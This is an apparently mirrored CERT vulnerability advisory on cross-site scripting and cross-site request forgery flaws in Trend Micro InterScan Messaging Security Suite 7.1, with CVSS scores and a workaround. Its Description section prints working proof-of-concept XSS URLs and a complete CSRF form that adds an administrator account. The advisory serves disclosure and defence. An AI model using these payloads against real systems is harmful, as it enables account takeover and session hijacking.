Executive Summary



This Alert is flagged as TOP 25 Common Weakness Enumeration from CWE/SANS. For more information, you can read this.
Summary
Title Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities
Informations
Name VU#471364 First vendor Publication 2012-09-13
Vendor VU-CERT Last vendor Modification 2012-09-14
Severity (Vendor) N/A Revision M

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Cvss Base Score 6.8 Attack Range Network
Cvss Impact Score 6.4 Attack Complexity Medium
Cvss Expoit Score 8.6 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Vulnerability Note VU#471364

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities

Original Release date: 13 Sep 2012 | Last revised: 14 Sep 2012

Overview

Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.

Description

Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

Impact

An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user's session.

Solution

We are currently unaware of a practical solution to this problem. Please consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Trend MicroAffected10 Aug 201212 Sep 2012
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

GroupScoreVector
Base6.8AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal5.5E:POC/RL:U/RC:UC
Environmental5.5CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

  • http://cwe.mitre.org/data/definitions/352.html
  • http://cwe.mitre.org/data/definitions/79.html
  • http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Credit

Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs:CVE-2012-2995CVE-2012-2996
  • Date Public:13 Sep 2012
  • Date First Published:13 Sep 2012
  • Date Last Updated:14 Sep 2012
  • Document Revision:14

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.

This product is provided subject to the Notification as indicated here: http://www.us-cert.gov/legal.html#notify

Original Source

Url : http://www.kb.cert.org/vuls/id/471364

CWE : Common Weakness Enumeration

% Id Name
50 % CWE-352 Cross-Site Request Forgery (CSRF) (CWE/SANS Top 25)
50 % CWE-79 Failure to Preserve Web Page Structure ('Cross-site Scripting') (CWE/SANS Top 25)

CPE : Common Platform Enumeration

TypeDescriptionCount
Application 1

ExploitDB Exploits

id Description
2012-09-14 Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF